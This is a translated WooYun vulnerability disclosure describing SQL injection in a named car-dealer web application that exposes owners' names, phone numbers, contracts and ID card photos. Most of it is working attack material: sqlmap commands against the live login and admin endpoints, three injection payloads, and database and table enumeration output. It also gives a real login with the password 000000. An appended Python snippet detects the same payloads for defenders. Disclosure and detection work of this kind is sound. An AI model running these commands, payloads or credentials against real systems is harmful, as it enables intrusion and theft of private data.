WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reading ------------------ http://drop.zone.ci/
2015-11-03: Details reported to the vendor, awaiting vendor handling
2015-11-04: Vendor has confirmed; details disclosed to the vendor only
2015-11-14: Details disclosed to core white hats and relevant domain experts
2015-11-24: Details disclosed to regular white hats
2015-12-04: Details disclosed to intern white hats
2015-12-19: Details disclosed to the public

Large amount of car owner information (name / phone number / license plate / contract / front and back ID card photos)

The site at http://wbgh.youxinpai.com/login/ appears to run the same codebase as the one in the earlier report http://wooyun.org/bugs/wooyun-2010-0149556.
sqlmap -u "http://wbgh.youxinpai.com/login/check/" --data "username=&password=m"
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
    Payload: username=-1231' OR 8092=8092#&password=m

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause
    Payload: username=-6771' OR 1 GROUP BY CONCAT(0x7178767a71,(SELECT (CASE WHEN (3647=3647) THEN 1 ELSE 0 END)),0x71717a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#&password=m

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment)
    Payload: username=' AND (SELECT * FROM (SELECT(SLEEP(5)))hVQi)#&password=m
---
[15:55:31] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.14
back-end DBMS: MySQL 5.0.12

Retrieving the databases:

current user: '[email protected].%'
available databases [4]:
[*] AuditDB
[*] information_schema
[*] test
[*] wbgh

Database: wbgh
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| credit_youfen_consume_category | 95080   |
| credit_youfen_consume          | 65559   |
| credit_youfen_credittrade      | 32144   |
| credit_youfen_consume_city     | 29079   |
| credit                         | 18627   |
| credit_result                  | 17279   |
| credit_youfen                  | 7238    |
| credit_zhongzhicheng           | 5550    |
| transfer_op                    | 5449    |
| transfer_img                   | 3868    |
| credit_digcredit               | 3578    |
| transfer_log                   | 1667    |
| transfer                       | 1167    |
| transfer_extend                | 816     |
| bg_back                        | 647     |
| area_city                      | 509     |
| jr_information                 | 457     |
| picc_back                      | 244     |
| rbac_masterrole                | 146     |
| rbac_master                    | 97      |
| rbac_actionrole                | 87      |
| rbac_action                    | 52      |
| rbac_log                       | 33      |
| area_province                  | 31      |
| area_opencity                  | 7       |
| area_bigarea                   | 4       |
| rbac_role                      | 4       |
| zh_confim                      | 1       |
+--------------------------------+---------+
The passwords are all weak; after decryption they turn out to be six zeros (000000).

Log in with any of them, e.g. username jinanwb, password 000000. After logging in there is further SQL injection:

sqlmap -u "http://wbgh.youxinpai.com/management/car_admit/?opt=search&showstatus=&old_car_no=&car_type=&buyse_order_id=&buyer_phone=&time_type=share&ftime=&etime=&select=%E6%9F%A5%E8%AF%A2" --cookie="你的cookie"

The car_type parameter is injectable.
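As an added defender-side example, not part of the original report: the following Python inspects URL-decoded form bodies and query strings for the three injection classes sqlmap reported against the login form (boolean tautology, FLOOR(RAND(0)*2) error oracle, SLEEP delay). The sample requests are constructed for the demo, reusing the payloads and endpoint paths shown above; the signatures are a request-logging or WAF-style detection aid, not a replacement for parameterized queries.

```python
import re
from urllib.parse import parse_qs

# Constructed sample requests (not captured traffic): a benign login, the three
# login payload classes sqlmap reported for this application, and a benign search
# on the car_admit endpoint whose car_type parameter the report found injectable.
SAMPLE_REQUESTS = [
    ("POST /login/check/", "username=jinanwb&password=000000"),
    ("POST /login/check/", "username=-1231' OR 8092=8092#&password=m"),
    ("POST /login/check/",
     "username=-6771' OR 1 GROUP BY CONCAT(0x7178767a71,(SELECT (CASE WHEN "
     "(3647=3647) THEN 1 ELSE 0 END)),0x71717a6b71,FLOOR(RAND(0)*2)) HAVING MIN(0)#"
     "&password=m"),
    ("POST /login/check/", "username=' AND (SELECT * FROM (SELECT(SLEEP(5)))hVQi)#&password=m"),
    ("GET /management/car_admit/", "opt=search&car_type=suv&select=%E6%9F%A5%E8%AF%A2"),
]

# One signature per injection class in the sqlmap output, applied after URL decoding
# so that %27, + and %23 encodings do not hide the quote, spaces or '#' terminator.
SIGNATURES = {
    # ' OR 8092=8092 : tautology that closes the string literal
    "boolean-based": re.compile(r"'\s*(?:OR|AND)\s+\d+\s*=\s*\d+", re.I),
    # FLOOR(RAND(0)*2) : duplicate-key trick that leaks data through a MySQL error
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    # SLEEP(5) / BENCHMARK(...) : delay used as a true/false oracle
    "time-based": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}


def classify_body(body: str) -> list[tuple[str, str]]:
    """Return (parameter, injection class) pairs found in a form body or query string."""
    hits = []
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            for label, pattern in SIGNATURES.items():
                if pattern.search(value):
                    hits.append((name, label))
    return hits


def scan(requests: list[tuple[str, str]]) -> list[tuple[str, str, str]]:
    """Flag every request whose decoded parameters carry one of the signatures."""
    alerts = []
    for target, body in requests:
        for name, label in classify_body(body):
            alerts.append((target, name, label))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_REQUESTS):
        print("%s  param=%s  %s" % alert)
```

Only the three login payloads are flagged; the benign login and the benign car_type search pass, which is the false-positive check a detection rule like this needs before it goes into production.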
[Screenshot: large number of contracts]
[Screenshot: large number of orders]
[Screenshot: order details]
[Screenshot: high-resolution ID card photos]
Fix recommendation: as above.

Please give a bit more Rank.

Severity: High
Vulnerability Rank: 15
Confirmed: 2015-11-04 17:50
Thank you very much for your attention and feedback!

None